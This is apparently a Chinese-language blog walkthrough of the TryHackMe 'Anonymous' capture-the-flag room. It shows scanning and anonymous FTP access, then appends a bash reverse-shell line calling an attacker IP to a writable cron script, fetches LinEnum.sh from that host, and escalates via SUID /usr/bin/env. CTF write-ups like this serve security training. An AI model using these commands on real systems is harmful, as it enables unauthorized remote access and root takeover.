今天来解比较综合的题目,Try Hack Me 上面的 Anonymous。
rustscan -a 10.10.142.45 -r 1-65535 --ulimit 5000
nmap -A -p21,22,139,445 10.10.142.45
ftp 10.10.142.45
使用 anonymous 登入scripts
资料夹
get {档名}
clean.sh
removed_files.log
to_do.txt
get
指令clean.sh
是一个 cron job
echo bash -c "'bash -i >& /dev/tcp /10.13.21.55/7877 0>&1'" >> clean.sh
nc -nlvp
来接sudo -l
wget 10.13.21.55:8000/LinEnum.sh
/usr/bin/env
有 suid/usr/bin/env /bin/sh -p
即可提权这一题告诉了我们,观察可以读写的 bash shell 档案,如果刚好遇到 Cron job,就有机会可以写入 Reverse shell。另外也可以透过自动化枚举程序,快速的找到可以用来提权的弱点。
>>: Day 10: 人工智慧在音乐领域的应用 (机器学习/深度学习与类神经网路一)
A.6 资讯安全之组织 A.6.1 内部组织 A.6.1.1 资讯安全之角色及责任 应定义及配置所有...
前情提要 昨天我们成功将模型部署到 Google AI Platform 上,并且也处理了授权的问题...
HTML5: <select id="testoption" name=&...
在写程序的过程, 多多少少会遇到需要复杂处理的状况, Go的优点是很多使用情境已经有前人帮忙整理成套...
大家好,我是毛毛。ヾ(´∀ ˋ)ノ 废话不多说开始今天的解题Day~ 58. Length of L...